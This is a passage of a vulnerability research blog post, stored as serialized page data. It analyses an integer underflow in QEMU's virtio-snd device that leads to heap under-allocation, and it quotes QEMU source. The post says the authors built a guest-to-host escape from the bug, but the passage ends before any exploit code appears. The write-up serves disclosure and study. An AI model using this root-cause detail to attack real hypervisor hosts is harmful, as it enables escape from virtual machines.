techniques.","2026-03-17T12:00:00.000Z","hrvoje",{"src":126211,"width":16,"height":17},"/posts/virtio-snd-qemu-0day/title.png",[126213,126214],"qemu","heap-overflow",{"type":23,"children":126216,"toc":134519},[126217,126222,126227,126232,126238,126243,126248,126256,126262,126274,126278,126283,126291,126296,126302,126307,126320,126930,126964,127009,127043,127078,127213,127261,127267,127272,128028,128073,128109,128144,128209,128229,128679,128726,128729,128734,128799,128825,128847,128851,128856,128861,128867,128872,128877,128882,128888,128901,128907,128912,128920,128990,128995,129001,129014,129240,129303,129322,129705,129710,129743,129748,130024,130036,130054,130333,130345,130348,130383,130388,130394,130406,130418,130423,130428,130438,130473,131090,131122,131133,131169,131182,131188,131200,131208,131234,131239,131272,131313,131319,131338,131376,131384,131433,131438,131487,131492,131500,131587,131593,131632,131644,131652,131670,131689,131697,131709,131717,131736,131744,131755,131763,131774,131782,131795,131803,131809,131814,131827,131835,131853,131861,131873,131878,131886,131922,131955,131962,131996,132004,132009,132015,132027,132038,132317,132377,132445,132453,132487,133091,133102,133110,133116,133121,133132,133886,133919,133931,134017,134037,134246,134293,134305,134311,134330,134356,134384,134400,134464,134467,134487,134501,134505,134510,134515],{"type":26,"tag":35,"props":126218,"children":126219},{},[126220],{"type":32,"value":126221},"Heap overflows are often exploitable, but far less so when the corrupted bytes are not under your control. In many cases, that kind of bug is written off as a crash and nothing more. However, in this post we show how we turned such an overflow into a reliable QEMU guest-to-host escape by abusing new glibc allocator behavior and QEMU-specific heap spray techniques.",{"type":26,"tag":92,"props":126223,"children":126224},{"id":126213},[126225],{"type":32,"value":126226},"QEMU",{"type":26,"tag":35,"props":126228,"children":126229},{},[126230],{"type":32,"value":126231},"QEMU is a machine emulator and virtualizer that lets a host system run guest operating systems. It presents the guest with virtual hardware, while the logic backing that hardware runs inside the host-side QEMU process.",{"type":26,"tag":118,"props":126233,"children":126235},{"id":126234},"virtio-devices",[126236],{"type":32,"value":126237},"Virtio Devices",{"type":26,"tag":35,"props":126239,"children":126240},{},[126241],{"type":32,"value":126242},"For guest-to-host escape research, the interesting part of QEMU is the interface between the guest and those host-side device implementations. Every request sent by the guest is eventually parsed and handled by code running in the QEMU process. This is interesting because any unhandled edge case in the device could lead to some kind of host state corruption.",{"type":26,"tag":35,"props":126244,"children":126245},{},[126246],{"type":32,"value":126247},"At a high level, the communication between the driver running in the guest and the device running on the host is simple - the guest-side virtio driver shares requests over virtqueues, while the host-side virtio device consumes those requests, processes and returns responses.",{"type":26,"tag":35,"props":126249,"children":126250},{},[126251],{"type":26,"tag":2210,"props":126252,"children":126255},{"alt":126253,"src":126254},"flowchart1","/posts/virtio-snd-qemu-0day/flowchart1.png",[],{"type":26,"tag":92,"props":126257,"children":126259},{"id":126258},"finding-a-bug",[126260],{"type":32,"value":126261},"Finding a Bug",{"type":26,"tag":35,"props":126263,"children":126264},{},[126265,126267,126273],{"type":32,"value":126266},"While looking for devices to research, we focused on ones that seemed to have received less scrutiny in the past. With that in mind, we started with the sound device ",{"type":26,"tag":130,"props":126268,"children":126270},{"className":126269},[],[126271],{"type":32,"value":126272},"virtio-snd",{"type":32,"value":470},{"type":26,"tag":118,"props":126275,"children":126276},{"id":126272},[126277],{"type":32,"value":126272},{"type":26,"tag":35,"props":126279,"children":126280},{},[126281],{"type":32,"value":126282},"From the official documentation:",{"type":26,"tag":5503,"props":126284,"children":126285},{},[126286],{"type":26,"tag":35,"props":126287,"children":126288},{},[126289],{"type":32,"value":126290},"Virtio sound implements capture and playback from inside a guest using the configured audio backend of the host machine.",{"type":26,"tag":35,"props":126292,"children":126293},{},[126294],{"type":32,"value":126295},"Essentially, it allows software running inside the guest to interact with the host's audio stack through a paravirtualized sound device. Playback streams send guest-provided audio data to the host backend, while capture streams let the guest receive audio input from the host.",{"type":26,"tag":21485,"props":126297,"children":126299},{"id":126298},"audio-data-buffers",[126300],{"type":32,"value":126301},"Audio Data Buffers",{"type":26,"tag":35,"props":126303,"children":126304},{},[126305],{"type":32,"value":126306},"This audio data flows through buffers allocated by the host-side virtio-snd device and stored in a FIFO linked list for the corresponding stream.",{"type":26,"tag":35,"props":126308,"children":126309},{},[126310,126312,126318],{"type":32,"value":126311},"For example, the following is ",{"type":26,"tag":130,"props":126313,"children":126315},{"className":126314},[],[126316],{"type":32,"value":126317},"virtio_snd_handle_rx_xfer",{"type":32,"value":126319},", which is responsible for allocating buffers for an input audio stream:",{"type":26,"tag":5512,"props":126321,"children":126323},{"code":126322,"language":4326,"meta":7,"className":19107,"style":7},"/*\n * The rx virtqueue handler. Makes the buffers available to their\n * respective streams for consumption.\n *\n * @vdev: VirtIOSound device\n * @vq: rx virtqueue\n */\nstatic void virtio_snd_handle_rx_xfer(VirtIODevice *vdev, VirtQueue *vq)\n{\n    VirtQueueElement *elem;\n    [...]\n\n    for (;;) {\n        VirtIOSoundPCMStream *stream;\n\n        elem = virtqueue_pop(vq, sizeof(VirtQueueElement));     // [1]\n        if (!elem) {\n            break;\n        }\n\n        [...]\n\n        WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n            size = iov_size(elem->in_sg, elem->in_num) -\n                sizeof(virtio_snd_pcm_status);                  // [2]\n            buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);\n            buffer->elem = elem;\n            buffer->vq = vq;\n            buffer->size = 0;\n            buffer->offset = 0;\n            QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry); // [3]\n        }\n        continue;\n\n        [...]\n}\n\n",[126324],{"type":26,"tag":130,"props":126325,"children":126326},{"__ignoreMap":7},[126327,126334,126342,126350,126357,126365,126373,126381,126429,126436,126453,126460,126467,126479,126496,126503,126539,126559,126570,126577,126584,126592,126599,126632,126691,126709,126748,126773,126797,126825,126852,126890,126897,126909,126916,126923],{"type":26,"tag":137,"props":126328,"children":126329},{"class":5559,"line":5560},[126330],{"type":26,"tag":137,"props":126331,"children":126332},{"style":5564},[126333],{"type":32,"value":51968},{"type":26,"tag":137,"props":126335,"children":126336},{"class":5559,"line":5412},[126337],{"type":26,"tag":137,"props":126338,"children":126339},{"style":5564},[126340],{"type":32,"value":126341}," * The rx virtqueue handler. Makes the buffers available to their\n",{"type":26,"tag":137,"props":126343,"children":126344},{"class":5559,"line":5417},[126345],{"type":26,"tag":137,"props":126346,"children":126347},{"style":5564},[126348],{"type":32,"value":126349}," * respective streams for consumption.\n",{"type":26,"tag":137,"props":126351,"children":126352},{"class":5559,"line":5642},[126353],{"type":26,"tag":137,"props":126354,"children":126355},{"style":5564},[126356],{"type":32,"value":22081},{"type":26,"tag":137,"props":126358,"children":126359},{"class":5559,"line":5745},[126360],{"type":26,"tag":137,"props":126361,"children":126362},{"style":5564},[126363],{"type":32,"value":126364}," * @vdev: VirtIOSound device\n",{"type":26,"tag":137,"props":126366,"children":126367},{"class":5559,"line":5850},[126368],{"type":26,"tag":137,"props":126369,"children":126370},{"style":5564},[126371],{"type":32,"value":126372}," * @vq: rx virtqueue\n",{"type":26,"tag":137,"props":126374,"children":126375},{"class":5559,"line":5878},[126376],{"type":26,"tag":137,"props":126377,"children":126378},{"style":5564},[126379],{"type":32,"value":126380}," */\n",{"type":26,"tag":137,"props":126382,"children":126383},{"class":5559,"line":5891},[126384,126388,126392,126397,126402,126406,126411,126416,126420,126425],{"type":26,"tag":137,"props":126385,"children":126386},{"style":5573},[126387],{"type":32,"value":53647},{"type":26,"tag":137,"props":126389,"children":126390},{"style":5573},[126391],{"type":32,"value":53652},{"type":26,"tag":137,"props":126393,"children":126394},{"style":5682},[126395],{"type":32,"value":126396}," virtio_snd_handle_rx_xfer",{"type":26,"tag":137,"props":126398,"children":126399},{"style":5601},[126400],{"type":32,"value":126401},"(VirtIODevice ",{"type":26,"tag":137,"props":126403,"children":126404},{"style":5590},[126405],{"type":32,"value":7152},{"type":26,"tag":137,"props":126407,"children":126408},{"style":5584},[126409],{"type":32,"value":126410},"vdev",{"type":26,"tag":137,"props":126412,"children":126413},{"style":5601},[126414],{"type":32,"value":126415},", VirtQueue ",{"type":26,"tag":137,"props":126417,"children":126418},{"style":5590},[126419],{"type":32,"value":7152},{"type":26,"tag":137,"props":126421,"children":126422},{"style":5584},[126423],{"type":32,"value":126424},"vq",{"type":26,"tag":137,"props":126426,"children":126427},{"style":5601},[126428],{"type":32,"value":5742},{"type":26,"tag":137,"props":126430,"children":126431},{"class":5559,"line":5909},[126432],{"type":26,"tag":137,"props":126433,"children":126434},{"style":5601},[126435],{"type":32,"value":13471},{"type":26,"tag":137,"props":126437,"children":126438},{"class":5559,"line":5930},[126439,126444,126448],{"type":26,"tag":137,"props":126440,"children":126441},{"style":5601},[126442],{"type":32,"value":126443},"    VirtQueueElement ",{"type":26,"tag":137,"props":126445,"children":126446},{"style":5590},[126447],{"type":32,"value":7152},{"type":26,"tag":137,"props":126449,"children":126450},{"style":5601},[126451],{"type":32,"value":126452},"elem;\n",{"type":26,"tag":137,"props":126454,"children":126455},{"class":5559,"line":5939},[126456],{"type":26,"tag":137,"props":126457,"children":126458},{"style":5601},[126459],{"type":32,"value":107381},{"type":26,"tag":137,"props":126461,"children":126462},{"class":5559,"line":6191},[126463],{"type":26,"tag":137,"props":126464,"children":126465},{"emptyLinePlaceholder":18},[126466],{"type":32,"value":6276},{"type":26,"tag":137,"props":126468,"children":126469},{"class":5559,"line":6208},[126470,126474],{"type":26,"tag":137,"props":126471,"children":126472},{"style":5610},[126473],{"type":32,"value":5613},{"type":26,"tag":137,"props":126475,"children":126476},{"style":5601},[126477],{"type":32,"value":126478}," (;;) {\n",{"type":26,"tag":137,"props":126480,"children":126481},{"class":5559,"line":6225},[126482,126487,126491],{"type":26,"tag":137,"props":126483,"children":126484},{"style":5601},[126485],{"type":32,"value":126486},"        VirtIOSoundPCMStream ",{"type":26,"tag":137,"props":126488,"children":126489},{"style":5590},[126490],{"type":32,"value":7152},{"type":26,"tag":137,"props":126492,"children":126493},{"style":5601},[126494],{"type":32,"value":126495},"stream;\n",{"type":26,"tag":137,"props":126497,"children":126498},{"class":5559,"line":6238},[126499],{"type":26,"tag":137,"props":126500,"children":126501},{"emptyLinePlaceholder":18},[126502],{"type":32,"value":6276},{"type":26,"tag":137,"props":126504,"children":126505},{"class":5559,"line":6247},[126506,126511,126515,126520,126525,126529,126534],{"type":26,"tag":137,"props":126507,"children":126508},{"style":5601},[126509],{"type":32,"value":126510},"        elem ",{"type":26,"tag":137,"props":126512,"children":126513},{"style":5590},[126514],{"type":32,"value":289},{"type":26,"tag":137,"props":126516,"children":126517},{"style":5682},[126518],{"type":32,"value":126519}," virtqueue_pop",{"type":26,"tag":137,"props":126521,"children":126522},{"style":5601},[126523],{"type":32,"value":126524},"(vq, ",{"type":26,"tag":137,"props":126526,"children":126527},{"style":5573},[126528],{"type":32,"value":57930},{"type":26,"tag":137,"props":126530,"children":126531},{"style":5601},[126532],{"type":32,"value":126533},"(VirtQueueElement));",{"type":26,"tag":137,"props":126535,"children":126536},{"style":5564},[126537],{"type":32,"value":126538},"     // [1]\n",{"type":26,"tag":137,"props":126540,"children":126541},{"class":5559,"line":6270},[126542,126546,126550,126554],{"type":26,"tag":137,"props":126543,"children":126544},{"style":5610},[126545],{"type":32,"value":5856},{"type":26,"tag":137,"props":126547,"children":126548},{"style":5601},[126549],{"type":32,"value":4625},{"type":26,"tag":137,"props":126551,"children":126552},{"style":5590},[126553],{"type":32,"value":23215},{"type":26,"tag":137,"props":126555,"children":126556},{"style":5601},[126557],{"type":32,"value":126558},"elem) {\n",{"type":26,"tag":137,"props":126560,"children":126561},{"class":5559,"line":6279},[126562,126566],{"type":26,"tag":137,"props":126563,"children":126564},{"style":5610},[126565],{"type":32,"value":5884},{"type":26,"tag":137,"props":126567,"children":126568},{"style":5601},[126569],{"type":32,"value":5604},{"type":26,"tag":137,"props":126571,"children":126572},{"class":5559,"line":6288},[126573],{"type":26,"tag":137,"props":126574,"children":126575},{"style":5601},[126576],{"type":32,"value":5936},{"type":26,"tag":137,"props":126578,"children":126579},{"class":5559,"line":6355},[126580],{"type":26,"tag":137,"props":126581,"children":126582},{"emptyLinePlaceholder":18},[126583],{"type":32,"value":6276},{"type":26,"tag":137,"props":126585,"children":126586},{"class":5559,"line":6363},[126587],{"type":26,"tag":137,"props":126588,"children":126589},{"style":5601},[126590],{"type":32,"value":126591},"        [...]\n",{"type":26,"tag":137,"props":126593,"children":126594},{"class":5559,"line":6393},[126595],{"type":26,"tag":137,"props":126596,"children":126597},{"emptyLinePlaceholder":18},[126598],{"type":32,"value":6276},{"type":26,"tag":137,"props":126600,"children":126601},{"class":5559,"line":6401},[126602,126607,126611,126615,126619,126623,126628],{"type":26,"tag":137,"props":126603,"children":126604},{"style":5682},[126605],{"type":32,"value":126606},"        WITH_QEMU_LOCK_GUARD",{"type":26,"tag":137,"props":126608,"children":126609},{"style":5601},[126610],{"type":32,"value":165},{"type":26,"tag":137,"props":126612,"children":126613},{"style":5590},[126614],{"type":32,"value":5694},{"type":26,"tag":137,"props":126616,"children":126617},{"style":5584},[126618],{"type":32,"value":38857},{"type":26,"tag":137,"props":126620,"children":126621},{"style":5601},[126622],{"type":32,"value":16348},{"type":26,"tag":137,"props":126624,"children":126625},{"style":5584},[126626],{"type":32,"value":126627},"queue_mutex",{"type":26,"tag":137,"props":126629,"children":126630},{"style":5601},[126631],{"type":32,"value":17395},{"type":26,"tag":137,"props":126633,"children":126634},{"class":5559,"line":6433},[126635,126640,126644,126649,126653,126657,126661,126666,126670,126674,126678,126683,126687],{"type":26,"tag":137,"props":126636,"children":126637},{"style":5601},[126638],{"type":32,"value":126639},"            size ",{"type":26,"tag":137,"props":126641,"children":126642},{"style":5590},[126643],{"type":32,"value":289},{"type":26,"tag":137,"props":126645,"children":126646},{"style":5682},[126647],{"type":32,"value":126648}," iov_size",{"type":26,"tag":137,"props":126650,"children":126651},{"style":5601},[126652],{"type":32,"value":165},{"type":26,"tag":137,"props":126654,"children":126655},{"style":5584},[126656],{"type":32,"value":54667},{"type":26,"tag":137,"props":126658,"children":126659},{"style":5601},[126660],{"type":32,"value":16348},{"type":26,"tag":137,"props":126662,"children":126663},{"style":5584},[126664],{"type":32,"value":126665},"in_sg",{"type":26,"tag":137,"props":126667,"children":126668},{"style":5601},[126669],{"type":32,"value":1108},{"type":26,"tag":137,"props":126671,"children":126672},{"style":5584},[126673],{"type":32,"value":54667},{"type":26,"tag":137,"props":126675,"children":126676},{"style":5601},[126677],{"type":32,"value":16348},{"type":26,"tag":137,"props":126679,"children":126680},{"style":5584},[126681],{"type":32,"value":126682},"in_num",{"type":26,"tag":137,"props":126684,"children":126685},{"style":5601},[126686],{"type":32,"value":5671},{"type":26,"tag":137,"props":126688,"children":126689},{"style":5590},[126690],{"type":32,"value":53464},{"type":26,"tag":137,"props":126692,"children":126693},{"class":5559,"line":6441},[126694,126699,126704],{"type":26,"tag":137,"props":126695,"children":126696},{"style":5573},[126697],{"type":32,"value":126698},"                sizeof",{"type":26,"tag":137,"props":126700,"children":126701},{"style":5601},[126702],{"type":32,"value":126703},"(virtio_snd_pcm_status);",{"type":26,"tag":137,"props":126705,"children":126706},{"style":5564},[126707],{"type":32,"value":126708},"                  // [2]\n",{"type":26,"tag":137,"props":126710,"children":126711},{"class":5559,"line":6501},[126712,126717,126721,126726,126730,126734,126739,126743],{"type":26,"tag":137,"props":126713,"children":126714},{"style":5601},[126715],{"type":32,"value":126716},"            buffer ",{"type":26,"tag":137,"props":126718,"children":126719},{"style":5590},[126720],{"type":32,"value":289},{"type":26,"tag":137,"props":126722,"children":126723},{"style":5682},[126724],{"type":32,"value":126725}," g_malloc0",{"type":26,"tag":137,"props":126727,"children":126728},{"style":5601},[126729],{"type":32,"value":165},{"type":26,"tag":137,"props":126731,"children":126732},{"style":5573},[126733],{"type":32,"value":57930},{"type":26,"tag":137,"props":126735,"children":126736},{"style":5601},[126737],{"type":32,"value":126738},"(VirtIOSoundPCMBuffer) ",{"type":26,"tag":137,"props":126740,"children":126741},{"style":5590},[126742],{"type":32,"value":356},{"type":26,"tag":137,"props":126744,"children":126745},{"style":5601},[126746],{"type":32,"value":126747}," size);\n",{"type":26,"tag":137,"props":126749,"children":126750},{"class":5559,"line":11634},[126751,126756,126760,126764,126768],{"type":26,"tag":137,"props":126752,"children":126753},{"style":5584},[126754],{"type":32,"value":126755},"            buffer",{"type":26,"tag":137,"props":126757,"children":126758},{"style":5601},[126759],{"type":32,"value":16348},{"type":26,"tag":137,"props":126761,"children":126762},{"style":5584},[126763],{"type":32,"value":54667},{"type":26,"tag":137,"props":126765,"children":126766},{"style":5590},[126767],{"type":32,"value":5593},{"type":26,"tag":137,"props":126769,"children":126770},{"style":5601},[126771],{"type":32,"value":126772}," elem;\n",{"type":26,"tag":137,"props":126774,"children":126775},{"class":5559,"line":11652},[126776,126780,126784,126788,126792],{"type":26,"tag":137,"props":126777,"children":126778},{"style":5584},[126779],{"type":32,"value":126755},{"type":26,"tag":137,"props":126781,"children":126782},{"style":5601},[126783],{"type":32,"value":16348},{"type":26,"tag":137,"props":126785,"children":126786},{"style":5584},[126787],{"type":32,"value":126424},{"type":26,"tag":137,"props":126789,"children":126790},{"style":5590},[126791],{"type":32,"value":5593},{"type":26,"tag":137,"props":126793,"children":126794},{"style":5601},[126795],{"type":32,"value":126796}," vq;\n",{"type":26,"tag":137,"props":126798,"children":126799},{"class":5559,"line":11697},[126800,126804,126808,126813,126817,126821],{"type":26,"tag":137,"props":126801,"children":126802},{"style":5584},[126803],{"type":32,"value":126755},{"type":26,"tag":137,"props":126805,"children":126806},{"style":5601},[126807],{"type":32,"value":16348},{"type":26,"tag":137,"props":126809,"children":126810},{"style":5584},[126811],{"type":32,"value":126812},"size",{"type":26,"tag":137,"props":126814,"children":126815},{"style":5590},[126816],{"type":32,"value":5593},{"type":26,"tag":137,"props":126818,"children":126819},{"style":5626},[126820],{"type":32,"value":5629},{"type":26,"tag":137,"props":126822,"children":126823},{"style":5601},[126824],{"type":32,"value":5604},{"type":26,"tag":137,"props":126826,"children":126827},{"class":5559,"line":11803},[126828,126832,126836,126840,126844,126848],{"type":26,"tag":137,"props":126829,"children":126830},{"style":5584},[126831],{"type":32,"value":126755},{"type":26,"tag":137,"props":126833,"children":126834},{"style":5601},[126835],{"type":32,"value":16348},{"type":26,"tag":137,"props":126837,"children":126838},{"style":5584},[126839],{"type":32,"value":16492},{"type":26,"tag":137,"props":126841,"children":126842},{"style":5590},[126843],{"type":32,"value":5593},{"type":26,"tag":137,"props":126845,"children":126846},{"style":5626},[126847],{"type":32,"value":5629},{"type":26,"tag":137,"props":126849,"children":126850},{"style":5601},[126851],{"type":32,"value":5604},{"type":26,"tag":137,"props":126853,"children":126854},{"class":5559,"line":26089},[126855,126860,126864,126868,126872,126876,126881,126886],{"type":26,"tag":137,"props":126856,"children":126857},{"style":5682},[126858],{"type":32,"value":126859},"            QSIMPLEQ_INSERT_TAIL",{"type":26,"tag":137,"props":126861,"children":126862},{"style":5601},[126863],{"type":32,"value":165},{"type":26,"tag":137,"props":126865,"children":126866},{"style":5590},[126867],{"type":32,"value":5694},{"type":26,"tag":137,"props":126869,"children":126870},{"style":5584},[126871],{"type":32,"value":38857},{"type":26,"tag":137,"props":126873,"children":126874},{"style":5601},[126875],{"type":32,"value":16348},{"type":26,"tag":137,"props":126877,"children":126878},{"style":5584},[126879],{"type":32,"value":126880},"queue",{"type":26,"tag":137,"props":126882,"children":126883},{"style":5601},[126884],{"type":32,"value":126885},", buffer, entry);",{"type":26,"tag":137,"props":126887,"children":126888},{"style":5564},[126889],{"type":32,"value":55232},{"type":26,"tag":137,"props":126891,"children":126892},{"class":5559,"line":26124},[126893],{"type":26,"tag":137,"props":126894,"children":126895},{"style":5601},[126896],{"type":32,"value":5936},{"type":26,"tag":137,"props":126898,"children":126899},{"class":5559,"line":26132},[126900,126905],{"type":26,"tag":137,"props":126901,"children":126902},{"style":5610},[126903],{"type":32,"value":126904},"        continue",{"type":26,"tag":137,"props":126906,"children":126907},{"style":5601},[126908],{"type":32,"value":5604},{"type":26,"tag":137,"props":126910,"children":126911},{"class":5559,"line":26140},[126912],{"type":26,"tag":137,"props":126913,"children":126914},{"emptyLinePlaceholder":18},[126915],{"type":32,"value":6276},{"type":26,"tag":137,"props":126917,"children":126918},{"class":5559,"line":26149},[126919],{"type":26,"tag":137,"props":126920,"children":126921},{"style":5601},[126922],{"type":32,"value":126591},{"type":26,"tag":137,"props":126924,"children":126925},{"class":5559,"line":26191},[126926],{"type":26,"tag":137,"props":126927,"children":126928},{"style":5601},[126929],{"type":32,"value":6507},{"type":26,"tag":35,"props":126931,"children":126932},{},[126933,126935,126941,126942,126948,126950,126955,126956,126962],{"type":32,"value":126934},"At ",{"type":26,"tag":130,"props":126936,"children":126938},{"className":126937},[],[126939],{"type":32,"value":126940},"[1]",{"type":32,"value":5027},{"type":26,"tag":130,"props":126943,"children":126945},{"className":126944},[],[126946],{"type":32,"value":126947},"VirtQueueElement *elem",{"type":32,"value":126949}," is popped from the virtqueue. It contains the ",{"type":26,"tag":130,"props":126951,"children":126953},{"className":126952},[],[126954],{"type":32,"value":126665},{"type":32,"value":3339},{"type":26,"tag":130,"props":126957,"children":126959},{"className":126958},[],[126960],{"type":32,"value":126961},"out_sg",{"type":32,"value":126963}," iovecs that describe the guest request, and is therefore fully guest-controlled.",{"type":26,"tag":35,"props":126965,"children":126966},{},[126967,126969,126975,126977,126983,126985,126991,126993,126999,127001,127007],{"type":32,"value":126968},"Further at ",{"type":26,"tag":130,"props":126970,"children":126972},{"className":126971},[],[126973],{"type":32,"value":126974},"[2]",{"type":32,"value":126976},", the device computes the size of the data buffer as ",{"type":26,"tag":130,"props":126978,"children":126980},{"className":126979},[],[126981],{"type":32,"value":126982},"iov_size(elem->in_sg, elem->in_num) - sizeof(virtio_snd_pcm_status)",{"type":32,"value":126984},". That value is then used in the allocation: ",{"type":26,"tag":130,"props":126986,"children":126988},{"className":126987},[],[126989],{"type":32,"value":126990},"g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size)",{"type":32,"value":126992},". Finally, at ",{"type":26,"tag":130,"props":126994,"children":126996},{"className":126995},[],[126997],{"type":32,"value":126998},"[3]",{"type":32,"value":127000},", the newly allocated buffer is appended to the ",{"type":26,"tag":130,"props":127002,"children":127004},{"className":127003},[],[127005],{"type":32,"value":127006},"stream->queue",{"type":32,"value":127008}," linked list.",{"type":26,"tag":35,"props":127010,"children":127011},{},[127012,127014,127019,127021,127026,127028,127033,127035,127041],{"type":32,"value":127013},"Because both the ",{"type":26,"tag":130,"props":127015,"children":127017},{"className":127016},[],[127018],{"type":32,"value":126665},{"type":32,"value":127020}," iovec and the ",{"type":26,"tag":130,"props":127022,"children":127024},{"className":127023},[],[127025],{"type":32,"value":126682},{"type":32,"value":127027}," field are guest-controlled, and there is no check that the total ",{"type":26,"tag":130,"props":127029,"children":127031},{"className":127030},[],[127032],{"type":32,"value":126665},{"type":32,"value":127034}," size is at least ",{"type":26,"tag":130,"props":127036,"children":127038},{"className":127037},[],[127039],{"type":32,"value":127040},"sizeof(virtio_snd_pcm_status)",{"type":32,"value":127042},", this calculation can underflow if the guest provides a smaller input buffer - that gives us our first bug.",{"type":26,"tag":35,"props":127044,"children":127045},{},[127046,127048,127053,127055,127061,127063,127069,127071,127077],{"type":32,"value":127047},"From the guest driver, we can provide an empty ",{"type":26,"tag":130,"props":127049,"children":127051},{"className":127050},[],[127052],{"type":32,"value":126665},{"type":32,"value":127054}," iovec. In that case, the calculation becomes ",{"type":26,"tag":130,"props":127056,"children":127058},{"className":127057},[],[127059],{"type":32,"value":127060},"0 - sizeof(virtio_snd_pcm_status)",{"type":32,"value":127062},", so the allocation size effectively becomes ",{"type":26,"tag":130,"props":127064,"children":127066},{"className":127065},[],[127067],{"type":32,"value":127068},"sizeof(VirtIOSoundPCMBuffer) - 8",{"type":32,"value":127070},". Given the definition of ",{"type":26,"tag":130,"props":127072,"children":127074},{"className":127073},[],[127075],{"type":32,"value":127076},"VirtIOSoundPCMBuffer",{"type":32,"value":7072},{"type":26,"tag":5512,"props":127079,"children":127081},{"code":127080,"language":4326,"meta":7,"className":19107,"style":7},"struct VirtIOSoundPCMBuffer {\n    QSIMPLEQ_ENTRY(VirtIOSoundPCMBuffer) entry;\n    VirtQueueElement *elem;\n    VirtQueue *vq;\n    size_t size;\n    uint64_t offset;\n    /* Used for the TX queue for lazy I/O copy from `elem` */\n    bool populated;\n    uint8_t data[];\n};\n",[127082],{"type":26,"tag":130,"props":127083,"children":127084},{"__ignoreMap":7},[127085,127097,127110,127125,127142,127154,127166,127174,127186,127206],{"type":26,"tag":137,"props":127086,"children":127087},{"class":5559,"line":5560},[127088,127092],{"type":26,"tag":137,"props":127089,"children":127090},{"style":5573},[127091],{"type":32,"value":11990},{"type":26,"tag":137,"props":127093,"children":127094},{"style":5601},[127095],{"type":32,"value":127096}," VirtIOSoundPCMBuffer {\n",{"type":26,"tag":137,"props":127098,"children":127099},{"class":5559,"line":5412},[127100,127105],{"type":26,"tag":137,"props":127101,"children":127102},{"style":5682},[127103],{"type":32,"value":127104},"    QSIMPLEQ_ENTRY",{"type":26,"tag":137,"props":127106,"children":127107},{"style":5601},[127108],{"type":32,"value":127109},"(VirtIOSoundPCMBuffer) entry;\n",{"type":26,"tag":137,"props":127111,"children":127112},{"class":5559,"line":5417},[127113,127117,127121],{"type":26,"tag":137,"props":127114,"children":127115},{"style":5601},[127116],{"type":32,"value":126443},{"type":26,"tag":137,"props":127118,"children":127119},{"style":5590},[127120],{"type":32,"value":7152},{"type":26,"tag":137,"props":127122,"children":127123},{"style":5601},[127124],{"type":32,"value":126452},{"type":26,"tag":137,"props":127126,"children":127127},{"class":5559,"line":5642},[127128,127133,127137],{"type":26,"tag":137,"props":127129,"children":127130},{"style":5601},[127131],{"type":32,"value":127132},"    VirtQueue ",{"type":26,"tag":137,"props":127134,"children":127135},{"style":5590},[127136],{"type":32,"value":7152},{"type":26,"tag":137,"props":127138,"children":127139},{"style":5601},[127140],{"type":32,"value":127141},"vq;\n",{"type":26,"tag":137,"props":127143,"children":127144},{"class":5559,"line":5745},[127145,127149],{"type":26,"tag":137,"props":127146,"children":127147},{"style":5573},[127148],{"type":32,"value":19157},{"type":26,"tag":137,"props":127150,"children":127151},{"style":5601},[127152],{"type":32,"value":127153}," size;\n",{"type":26,"tag":137,"props":127155,"children":127156},{"class":5559,"line":5850},[127157,127161],{"type":26,"tag":137,"props":127158,"children":127159},{"style":5573},[127160],{"type":32,"value":58215},{"type":26,"tag":137,"props":127162,"children":127163},{"style":5601},[127164],{"type":32,"value":127165}," offset;\n",{"type":26,"tag":137,"props":127167,"children":127168},{"class":5559,"line":5878},[127169],{"type":26,"tag":137,"props":127170,"children":127171},{"style":5564},[127172],{"type":32,"value":127173},"    /* Used for the TX queue for lazy I/O copy from `elem` */\n",{"type":26,"tag":137,"props":127175,"children":127176},{"class":5559,"line":5891},[127177,127181],{"type":26,"tag":137,"props":127178,"children":127179},{"style":5573},[127180],{"type":32,"value":49075},{"type":26,"tag":137,"props":127182,"children":127183},{"style":5601},[127184],{"type":32,"value":127185}," populated;\n",{"type":26,"tag":137,"props":127187,"children":127188},{"class":5559,"line":5909},[127189,127193,127197,127202],{"type":26,"tag":137,"props":127190,"children":127191},{"style":5573},[127192],{"type":32,"value":61058},{"type":26,"tag":137,"props":127194,"children":127195},{"style":5601},[127196],{"type":32,"value":17696},{"type":26,"tag":137,"props":127198,"children":127199},{"style":5573},[127200],{"type":32,"value":127201},"[]",{"type":26,"tag":137,"props":127203,"children":127204},{"style":5601},[127205],{"type":32,"value":5604},{"type":26,"tag":137,"props":127207,"children":127208},{"class":5559,"line":5930},[127209],{"type":26,"tag":137,"props":127210,"children":127211},{"style":5601},[127212],{"type":32,"value":19170},{"type":26,"tag":35,"props":127214,"children":127215},{},[127216,127218,127224,127226,127231,127233,127238,127240,127245,127247,127252,127254,127260],{"type":32,"value":127217},"That under-allocation removes the ",{"type":26,"tag":130,"props":127219,"children":127221},{"className":127220},[],[127222],{"type":32,"value":127223},"populated",{"type":32,"value":127225}," field along with the variable-sized ",{"type":26,"tag":130,"props":127227,"children":127229},{"className":127228},[],[127230],{"type":32,"value":6303},{"type":32,"value":127232}," array. As the comment says, ",{"type":26,"tag":130,"props":127234,"children":127236},{"className":127235},[],[127237],{"type":32,"value":127223},{"type":32,"value":127239}," is only relevant to the TX path and is not used for audio input. However, by making the iovec size ",{"type":26,"tag":130,"props":127241,"children":127243},{"className":127242},[],[127244],{"type":32,"value":878},{"type":32,"value":127246},", the device believes data should be ",{"type":26,"tag":130,"props":127248,"children":127250},{"className":127249},[],[127251],{"type":32,"value":878},{"type":32,"value":127253}," byte, while the actual allocation is ",{"type":26,"tag":130,"props":127255,"children":127257},{"className":127256},[],[127258],{"type":32,"value":127259},"sizeof(VirtIOSoundPCMBuffer) - 7",{"type":32,"value":470},{"type":26,"tag":21485,"props":127262,"children":127264},{"id":127263},"populating-data-buffers",[127265],{"type":32,"value":127266},"Populating Data Buffers",{"type":26,"tag":35,"props":127268,"children":127269},{},[127270],{"type":32,"value":127271},"Let's take a look at how the allocated data buffer for the input stream is filled:",{"type":26,"tag":5512,"props":127273,"children":127275},{"code":127274,"language":4326,"meta":7,"className":19107,"style":7},"/*\n * AUD_* input callback.\n *\n * @data: VirtIOSoundPCMStream stream\n * @available: number of bytes that can be read with AUD_read()\n */\nstatic void virtio_snd_pcm_in_cb(void *data, int available)\n{\n    VirtIOSoundPCMStream *stream = data;\n    VirtIOSoundPCMBuffer *buffer;\n    size_t size, max_size;\n\n    